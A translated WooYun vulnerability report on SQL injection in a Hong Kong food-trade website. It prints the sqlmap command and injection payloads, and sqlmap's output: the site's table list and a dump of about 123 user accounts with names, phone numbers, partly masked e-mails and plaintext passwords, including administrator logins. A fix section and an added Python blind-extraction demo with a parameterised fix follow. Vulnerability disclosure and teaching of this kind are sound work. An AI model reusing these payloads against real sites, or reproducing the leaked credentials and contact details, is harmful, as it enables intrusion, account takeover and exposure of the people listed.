Vulnerability summary

Defect ID: wooyun-2015-0151173

Title: SQL injection in a page of Canada Food Network (加拿大食品網) (59 tables; a large number of user e-mail addresses, names, passwords and phone numbers leaked) (Hong Kong)

Vendor: 加拿大食品網 (Canada Food Network)

Author: 路人甲

Submitted: 2015-11-03 15:06

Fix date: 2015-12-19 18:30

Published: 2015-12-19 18:30

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Handed to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-11-03: Details sent to the vendor, awaiting vendor response
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and relevant domain experts
2015-11-24: Details disclosed to ordinary white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public

Brief description:

The Agriculture Section of the Consulate General of Canada in Hong Kong promotes Canadian agri-food products in Hong Kong and Macau, sources marketable Canadian food products for Hong Kong and Macau importers, matches business partners, and provides technical and investment information on Canadian agri-food products.
Hong Kong's agri-food imports from Canada came close to HK$670 million in 2013, 27% more than in 2012, the best testimony to "Quality is in our Nature", Canadian agri-food quality that comes from nature.

Details:

URL: http://**.**.**.**/trade/detail.php?cr=D&cID=5

The cID GET parameter of detail.php is injectable. The probes in the proof below need no quote character to break out of the statement, so the value is interpolated into the query as a bare integer. The user table was dumped with sqlmap using the boolean-based blind, error-based and time-based techniques (--technique=BET):

python sqlmap.py -u "http://**.**.**.**/trade/detail.php?cr=D&cID=5" -p cID --technique=BET --random-agent --batch -D official_cfhkd -T user -C uEmail,uID,uName,uPassword,uTel --dump

Proof:

---
Parameter: cID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cr=D&cID=5 AND 1405=1405
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cr=D&cID=5 AND (SELECT 5696 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5696=5696,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cr=D&cID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))wJsI)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'u_official_cfhkd@%'
current user is DBA: False
database management system users [1]:
[*] 'u_official_cfhkd'@'%'
available databases [2]:
[*] information_schema
[*] official_cfhkd
Database: official_cfhkd
[59 tables]
+--------------------------+
| user |
| about_us_organ |
| about_us_person |
| company |
| company_bk |
| company_bk2 |
| company_test |
| contact_us_about_comp |
| contact_us_dis_channel |
| coupon |
| coupon_bk |
| coupon_bk2 |
| enquiry |
| enquiry_comp_desc |
| enquiry_comp_dis_channel |
| food_general |
| food_general_bk |
| food_general_test |
| foodcategory |
| foodcategory_bk |
| foodcategory_test |
| health_info |
| home_slider |
| news |
| news_bk |
| news_bk2 |
| news_bk3 |
| news_test |
| paragraphs |
| product |
| product_bk |
| product_bk2 |
| product_test |
| promotions |
| promotions_bk |
| promotions_bk2 |
| promotions_bk3 |
| promotions_test |
| recipes |
| recipes_bk |
| recipes_bk2 |
| recipes_bk3 |
| recipes_test |
| region |
| shop |
| shop_bk |
| shop_bk2 |
| shop_test |
| shopproduct |
| shopproduct_bk |
| shopproduct_bk2 |
| shopproduct_test |
| sitemap |
| tmp_shop |
| useful_links |
| user_bk1 |
| user_bk2 |
| user_test |
| w |
+--------------------------+
Database: official_cfhkd
Table: user
[9 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| abled | varchar(5) |
| uCID | int(10) unsigned |
| uEmail | varchar(60) |
| uID | int(10) unsigned |
| uLevel | int(10) |
| uLogin | varchar(60) |
| uName | varchar(100) |
| uPassword | varchar(20) |
| uTel | varchar(20) |
+-----------+------------------+
Database: official_cfhkd
Table: user
[123 entries]
+----------------------------------+-----+---------------------------------------------+----------------+------------------+
| uEmail | uID | uName | uPassword | uTel |
+----------------------------------+-----+---------------------------------------------+----------------+------------------+
| juliana.che@**.**.**.** | 1 | Juliana Che | 25284729 | 25284729 |
| mandy@**.**.**.** | 2 | Mandy Wong | 23888233 | 23888233 |
| thomas@**.**.**.** | 3 | Thomas Yew | 23888233 | 23888233 |
| richard@**.**.**.** | 4 | Richard S. Chen | 23856044 | (852) 2385 6044 |
| pofoods@**.**.**.** | 5 | Benson Chan | 29848148 | (852) 2984 8148 |
| leslielam@**.**.**.** | 6 | Leslie Y.H. Lam | 27683512 | (852) 2768 3512 |
| viviankwok@**.**.**.** | 7 | Vivian Kwok | 37412728 | 37412728 |
| vicky_chan@**.**.**.** | 8 | Vicky K.P. Chan | 26803875 | 26803875 |
| calvinfung@**.**.**.** | 9 | Calvin Fung | 25527128 | 25527128 |
| paulinelai@**.**.**.** | 10 | Pauline Lai | 25453138 | (852) 2545 3138 |
| kevinhui@**.**.**.** | 11 | Kevin Hui | 35526260 | (852) 3552 6260 |
| janeng@**.**.**.** | 12 | Jane Ng | 35526262 | (852) 3552 6262 |
| cynthiachan@**.**.**.** | 13 | Cynthia Chan | 28892213 | (852) 2889 2213 |
| jason@**.**.**.** | 14 | Jason Willis | 21505739 | 21505739 |
| kwjng601@**.**.**.** | 15 | Johnny Ng | 24771823 | (852) 2477 1823 |
| kiyoshi@**.**.**.** | 16 | Kiyoshi Caines | 25734988 | 25734988 |
| jason@**.**.**.** | 17 | Jason Leung | 37692378 | (852) 3769 2378 |
| patrick@**.**.**.** | 18 | Patrick | 22460088 | (852) 2246 0088 |
| viola@**.**.**.** | 19 | Viola | 22460088 | (852) 2246 0088 |
| stanley_ng@**.**.**.** | 20 | Stanley Ng | 29689888 | 29689888 |
| Wilson_Kong@**.**.**.** | 21 | Wilson Kong | 29689888 | 29689888 |
| peter@**.**.**.** | 22 | Peter | 34228718 | (852) 3422 8718 |
| polly@**.**.**.** | 23 | Polly | 34228718 | (852) 3422 8718 |
| eva@**.**.**.** | 24 | Eva - The Food Source Ltd. | 34228718 | (852) 3422 8718 |
| ginseng@**.**.**.** | 25 | Kim Ming, Chan | 25435388 | (852) 2543 5388 |
| dho@**.**.**.** | 26 | Dennis Ho | 123456 | (852) 2345 6789 |
| [email protected] | 27 | Melissa Ng | 6042784450 | (604) 278 4450 |
| tungpang-food@**.**.**.** | 28 | Tung Pang | 24043838 | (852) 2408 3838 |
| shirley.sum@**.**.**.** | 29 | Shirley Sum | 23116018 | 23116018 |
| denisetam@**.**.**.** | 30 | Denise | 28388902 | (852) 2838 8902 |
| erin@**.**.**.** | 31 | Erin Cheung | 23053858 | 23053858 |
| terence@**.**.**.** | 32 | Terence Cheung | 23053858 | 23053858 |
| paullam@**.**.**.** | 33 | Paul Lam | 26062000 | 26062000 |
| lawmanghing@**.**.**.** | 34 | Mr. Law Mang Hing | 24889025 | (852) 2488 9025 |
| mng@**.**.**.** | 35 | Merlinda Ng | 29114989 | 29114989 |
| jack_lee@**.**.**.** | 36 | Jack Lee | 28216254 | 28216254 |
| sharon.l@**.**.**.** | 37 | Sharon Lai | 24815111 | 24815111 |
| fanny@**.**.**.** | 38 | Fanny So | 27307117 | (852) 2730 7117 |
| cl@**.**.**.** | 39 | Chole Lee | 28983252 | 28983252 |
| lindaliang@**.**.**.** | 40 | Linda Liang | 28822347 | 28822347 |
| pwchan007@**.**.**.** | 41 | Stephen Chan | 24889025 | (852) 2488 9025 |
| parktak@**.**.**.** | 42 | Albert Ng | parktakcanada | (905) 477 8926 |
| phoebechan@organicla | 43 | Phoebe Chan | 28506166 | 28506166 |
| rogertiu@**.**.**.** | 44 | Roger Tiu | rogertiu | NULL |
| lilian@**.**.**.** | 45 | Lilian Ip | 28810806 | 28810806 |
| raymondchan@**.**.**.** | 51 | 陳偉龍 Raymond Chan | Raymond2012 | +852-5428-7158 |
| mandy@**.**.**.** | 52 | Top Administrator | cdahk2014 | Not Applicable |
| subadmin1@**.**.**.** | 53 | Sub Administrator | subadmin1 | Not Applicable |
| subadmin2@**.**.**.** | 72 | Sub Administrator | subadmin2 | Not Applicable |
| info@**.**.**.** | 82 | PERFECT | 748480ykcan | (852) 3483 5654 |
| honey@**.**.**.** | 92 | Greg Mohr | 2048170253 | (204) 817 0253 |
| kkhorichard@**.**.**.** | 102 | Wing Wing Company | 6042547241 | (604) 254 7241 |
| beaverlakewine@**.**.**.** | 112 | Beaver Lake | 51867417 | (852) 5186 7417 |
| info@**.**.**.** | 122 | D`Angelo Wine Cellar | 27303890 | (852) 2730 3890 |
| claudiacheung@**.**.**.** | 132 | Impex Quality Products Ltd. | 35212020 | (852) 3521 2020 |
| cleung@**.**.**.** | 142 | Yo Bago | 2561-7700 | (852) 2561 7700 |
| nathan_louey@**.**.**.** | 152 | Telford International Company Limited | 23152536 | (852) 2315 2536 |
| joseph@**.**.**.** | 162 | The Big Bite | 69799690 | (852) 6979 9690 |
| sales@**.**.**.** | 172 | Hun Tai (HK) Ltd | 24285668 | (852) 2428 5668 |
| cindylo@**.**.**.** | 182 | Green dot dot | 31814488 | (852) 3181 4488 |
| colindung@**.**.**.** | 191 | Best Way Food International Trading Ltd. | 35689170 | (852) 3568 9170 |
| hello@**.**.**.** | 201 | Joseph Luk | 25467628 | (852) 2546 7628 |
| [email protected] | 211 | Quebec Mall Limited (HK) | 54148745 | (852) 8192 7852 |
| dandhongkong@**.**.**.** | 221 | Dan-D Pak | 39701833 | (852 ) 3970 1833 |
| avis.lo@**.**.**.** | 231 | Pacifico Corp | 34228328 | (852) 3422 8328 |
| info@**.**.**.** | 241 | Chubby Charlie | 91710688 | (852) 9171 0688 |
| NULL | 251 | Thomas Lau | 21563356 | (852) 2156 3356 |
| sara.tsang@**.**.**.** | 261 | Milon Wine | 39709381 | (852) 3970 9381 |
| germain@**.**.**.** | 271 | Muwin Estate | 6811545 | (902) 681 1545 |
| islandsalt@**.**.**.** | 281 | Andrew Shepherd | 12508824489 | (250) 882 4489 |
| info@**.**.**.** | 291 | BC Blueberry Council | 8642117 | (604) 864 2117 |
| justin@**.**.**.** | 301 | Northern Divine | 8854688 | (604) 885 4688 |
| [email protected] | 311 | Fruit d‘ Or | 3851126 | (819) 385 1126 |
| info@**.**.**.** | 321 | Canards du lac Brome | 2423825 | (450) 242 3825 |
| swells@**.**.**.** | 331 | Organic Trade Association | 3353423 | (250) 335 3423 |
| pho@**.**.**.** | 341 | Windset Farms | 0r4pr0n0b15 | (604) 940 7700 |
| mcbergevin@**.**.**.** | 351 | La Maison Bergevin | 6249797 | (418) 624 9797 |
| NULL | 361 | Lassonde Industries Inc. | 5464399 | (416) 546 4399 |
| evelyn.tang@ClassicFineF**.**.**.** | 362 | Classic Fine Foods (Hong Kong) Ltd. | 26122066 | (852) 2612 2066 |
| evelyn.tang@ClassicFineF**.**.**.** | 372 | Classic Fine Foods (Hong Kong) Ltd. | 26122066 | (852) 2612 2066 |
| walterso@**.**.**.** | 382 | Dai Fung (Asia) Company Limited | 27905518 | (852) 2790 5518 |
| rickhoward@**.**.**.** | 392 | R2 Concepts | 98002725 | (852) 9800 2725 |
| NULL | 402 | ABCDE | 123456 | NULL |
| fanny@**.**.**.** | 412 | Rich One Beauty and Health Products Ltd. | 27307117 | (852) 2730 7117 |
| el@**.**.**.** | 422 | Rainbow Assets Ltd. | 28983252 | (852) 2898 3252 |
| swissinternationalhk@**.**.**.** | 432 | Swiss International (Hong Kong) Ltd. | swissrt8573 | (852) 2515 0660 |
| [email protected] | 442 | CallingwoodAgri | 7783003282 | (778) 300 3282 |
| BMaier@**.**.**.** | 451 | The Original Cakerie | 5153378 | (604) 515 3378 |
| info@**.**.**.** | 461 | Redwood Health | 28152121 | (852) 2815 2121 |
| keith@**.**.**.** | 471 | BC Fine Foods | 24271950 | (852) 2427 1950 |
| scott@**.**.**.** | 481 | Royal Canadian Water Company Ltd. | 9003315 | (416) 900 3315 |
| [email protected] | 482 | Vieni Estates Inc. | 7493655 | (416) 749 3655 |
| paubry@**.**.**.** | 492 | Coyote`s Run Estate Winery | 6828310 | (905) 682 8310 |
| inquiry@**.**.**.** | 502 | Pelee Island Winery | 7336551 | (519) 733 6551 |
| enquiry@**.**.**.** | 512 | International Fine Foods Ltd. | 35833366 | (852) 3583 3366 |
| sales@**.**.**.** | 521 | Frutodor | 27611100 | (852) 2761 1100 |
| admin@**.**.**.** | 531 | Heylux Company Limited | 27963378 | (852) 2796 3378 |
| info@**.**.**.** | 541 | Target Marine Hatcheries | 8854688 | (604) 885 4688 |
| [email protected] | 551 | Consolidated Fruit Packers Ltd. | 8681400 | (250) 868 1400 |
| winsonchan@**.**.**.** | 561 | Million Gourmet Ltd. | 28892213 | (852) 2889 2213 |
| marianaplus@**.**.**.** | 571 | Mariana Health Foods Inc. | 7266046 | (709) 726 6046 |
| info@**.**.**.** | 581 | L**.**.**.** | 20069194 | (852) 2117 0337 |
| info@wilsonf**.**.**.**.hk | 591 | Wilson International Frozen Foods (HK) Ltd. | 36780888 | (852) 3678 0888 |
| [email protected] | 592 | Aliments ED Foods | 3511254 | (604) 351 1254 |
| admin@**.**.**.** | 602 | Groupe Bergeron- Thibault | 3733333 | (819) 373 3333 |
| jm.labonte@**.**.**.** | 612 | Miel Labonte Honey | 7583877 | (819) 758 3877 |
| info@**.**.**.** | 622 | Love Natural Ltd. | 35848153 | (852) 3584 8153 |
| aiyanlee@**.**.**.** | 632 | BC wine | bcwine | (852) 6958 1240 |
| SonnieN@**.**.**.** | 642 | Watson‘s Wine | 26068828 | (852) 2606 8828 |
| michael.ngan@**.**.**.** | 652 | Organic Experience Management Group | 29812888 | (852) 2981 2888 |
| info@**.**.**.** | 661 | Pure Canada | 9124448 | (514) 912 4448 |
| hongkong@**.**.**.** | 671 | Syncrotrade | 7888153 | (778) 788 8153 |
| daniel.mencius@**.**.**.** | 681 | Golden Eagle Aquaculture Inc. | 6878813 | (604) 687 8813 |
| lee.masoud@**.**.**.** | 691 | Mondiv | 9790717 | (877) 979 0717 |
| puneet@nanakf**.**.**.** | 701 | Punjab Milk Foods Inc | 5949190 | (604) 594 9190 |
| catherine@**.**.**.** | 711 | The Chai Company | 9409887 | (604) 940 9881 |
| [email protected] | 721 | Nature‘s Health Products Canada Corp. | 2302751 | (800) 230 2751 |
| aschk@**.**.**.** | 731 | ASC Fine Wines | 39236700 | (852) 3923 6700 |
| [email protected] | 741 | Camus Wines & Spirits | 28311509 | (852) 2831 1509 |
| jchen@**.**.**.** | 751 | Ocean Choice International | 34622742 | (852) 3462 2742 |
| patriciahovington@**.**.**.** | 761 | DeSeve | 4388759950 | (514) 629 8773 |
| ozenimm@**.**.**.** | 771 | Ozen International Company Limited | 51397788 | (852) 5139 7788 |
| jnjtrading403@**.**.**.** | 781 | J&Jtrading | 96461030 | (852) 36461030 |
+----------------------------------+-----+---------------------------------------------+----------------+------------------+

Fix recommendation:

Put a WAF in front of the site as a stopgap. A WAF only filters payload shapes it recognises; the underlying defect is that cID is concatenated into the SQL statement, so the real fix is to pass it through a prepared statement (and, since it is an ID, to cast it to an integer before it reaches the query). The dump also shows that uPassword is stored in plaintext in a varchar(20) column, that many passwords are simply the user's phone number, and that backup and test copies of production tables (user_bk1, user_bk2, user_test, company_bk, news_bk, ...) remain in the live database: store passwords with a salted, slow hash such as bcrypt, force a reset for every account in the dump, and drop the stale copies. The application's database account is not a DBA (current user is DBA: False), which limited the damage here and should stay that way.
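The following is an added example, not code from the original report or from the affected site. It simulates the bug class shown in the details and proof sections above, and the hardened handler the fix recommendation calls for, in a self-contained Python script backed by an in-memory SQLite database with constructed sample rows. It shows why the probe `5 AND 1405=1405` works with no quote character (cID is interpolated as a bare integer), how a TRUE/FALSE page oracle becomes a boolean-based blind extractor that recovers a plaintext uPassword value character by character, and the parameterised rewrite that closes the hole. Table and column names follow the sqlmap output; the rows, the query assumed to be inside detail.php, and the function names are assumptions.

```python
"""Added example, not from the original report: boolean-based blind SQL injection
against an unquoted integer parameter, and the parameterised fix.
SQLite stands in for MySQL; rows below are constructed, not real data."""
import sqlite3
from typing import Callable, Tuple


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for official_cfhkd with constructed sample rows.
    The user table mirrors the columns in the dump; the values are invented."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE company (cID INTEGER PRIMARY KEY, cName TEXT);
        CREATE TABLE user (
            uID INTEGER PRIMARY KEY, uEmail TEXT, uName TEXT,
            uPassword TEXT, uTel TEXT);
        INSERT INTO company VALUES (5, 'Example Importer Ltd.');
        INSERT INTO user VALUES
            (52, 'admin@example.invalid', 'Top Administrator', 'Pa55word', 'Not Applicable');
    """)
    return conn


def detail_vulnerable(conn: sqlite3.Connection, cid: str) -> bool:
    """Assumed shape of the vulnerable detail.php: the raw GET value is pasted
    into the statement unquoted, so `5 AND <expr>` is valid SQL as-is.
    Returns True when the page would render a company (a row came back)."""
    sql = f"SELECT cName FROM company WHERE cID = {cid}"
    return conn.execute(sql).fetchone() is not None


def detail_hardened(conn: sqlite3.Connection, cid: str) -> bool:
    """Same lookup with two independent controls: coerce to the expected type
    before the value goes anywhere near SQL, and bind it as a parameter."""
    try:
        cid_int = int(cid)
    except ValueError:
        return False  # "5 AND 1405=1405" is rejected here
    row = conn.execute("SELECT cName FROM company WHERE cID = ?", (cid_int,)).fetchone()
    return row is not None


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 32) -> str:
    """Recover the string produced by `subquery` using only the TRUE/FALSE
    oracle. Each character is found by bisection on its code point (seven
    requests per character instead of one per candidate), which is how
    sqlmap's boolean-based blind technique works. SQLite's unicode() stands
    in for MySQL's ORD(); SUBSTR behaves the same on both."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"5 AND unicode(SUBSTR(({subquery}),{pos},1)) > {mid}"
            if oracle(probe):
                lo = mid + 1  # code point is above mid
            else:
                hi = mid      # code point is mid or below
        if lo == 0:           # SUBSTR past the end gives '' -> NULL: end of string
            break
        out += chr(lo)
    return out


def demo() -> Tuple[str, bool]:
    """Run the attack against the vulnerable handler, then the hardened one."""
    conn = build_db()
    oracle = lambda payload: detail_vulnerable(conn, payload)
    # The two sqlmap-style probes: normal page for 1405=1405, empty for 1405=1406.
    assert oracle("5 AND 1405=1405") and not oracle("5 AND 1405=1406")
    leaked = blind_extract(oracle, "SELECT uPassword FROM user WHERE uID = 52")
    blocked = detail_hardened(conn, "5 AND 1405=1405")
    return leaked, blocked


if __name__ == "__main__":
    pw, blocked = demo()
    print(f"recovered uPassword via blind oracle: {pw!r}; hardened handler returned {blocked}")
```

The oracle only needs to tell a normal page from an empty one, which is exactly what the `AND 1405=1405` / `AND 1405=1406` pair in the proof establishes; everything else is bisection. Against MySQL the same probe would read `ORD(SUBSTR((...),pos,1))`, and a collation-insensitive `=` comparison on the character itself is avoided for the same reason sqlmap avoids it.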

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2015-11-04 18:28

Vendor reply:

The incident has been reported to the relevant organisation.

Latest status:

None